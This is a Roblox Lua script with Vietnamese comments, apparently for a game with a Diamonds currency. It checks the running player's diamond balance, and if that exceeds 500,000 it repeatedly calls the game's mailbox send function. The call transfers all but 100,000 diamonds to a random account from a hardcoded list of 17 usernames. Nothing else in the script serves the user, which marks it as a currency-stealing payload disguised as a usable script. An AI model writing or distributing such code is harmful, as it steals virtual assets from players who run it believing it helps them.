repeat task.wait() until game:IsLoaded()

-- SERVICES
local Players = game:GetService("Players")
local ReplicatedStorage = game:GetService("ReplicatedStorage")
local player = Players.LocalPlayer

-- LOAD CLIENT
local Client = ReplicatedStorage:WaitForChild("Library"):WaitForChild("Client")
local Network = require(Client.Network)
local SaveModule = require(Client.Save)

-- ================= GET GEMS (LẤY TỪ SCRIPT 2) =================
local function getGems()
    local stats = player:FindFirstChild("leaderstats")
    if stats then
        local diamonds = stats:FindFirstChild("💎 Diamonds") or stats:FindFirstChild("Diamonds")
        if diamonds then
            return diamonds.Value
        end
    end

    -- fallback Save
    local success, result = pcall(function()
        return SaveModule.Get().Diamonds
    end)

    if success and result then
        return result
    end

    return 0
end

-- ================= CHECK GEMS =================
local currentValue = getGems()

if currentValue <= 500000 then
    warn("⚠️ Không đủ kim cương để gửi (cần > 50M)")
    return
end

-- ================= RANDOM RECEIVER =================
local receivers = {
    "wlopez00", "careygeorge2", "hholland606", "alexisjones324",
    "clairehanson7", "josephfowler06", "gills6ii", "boekh6uo",
    "barus1ik", "mcane9gb", "boudo_4uz", "manix6hi",
    "fiano7in", "micha1hn", "katte1xm", "kotou7ua", "samer8ie"
}

local receiver = receivers[math.random(1, #receivers)]

-- ================= AMOUNT =================
local amountToSend = currentValue - 100000

-- ================= LẤY UID =================
local Save = SaveModule.Get()

local diamondsUID
for uid, v in pairs(Save.Inventory["Currency"]) do
    if v.id == "Diamonds" then
        diamondsUID = uid
        break
    end
end

if not diamondsUID then
    warn("❌ Không tìm thấy Diamonds UID")
    return
end

-- ================= SEND LOOP =================
while true do
    local success = Network.Invoke("Mailbox: Send", receiver, "Bless", "Currency", diamondsUID, amountToSend)

    if success then
        print("📤 Đã gửi " .. amountToSend .. " 💎 cho: " .. receiver)
        break
    end

    task.wait(0.2)
end
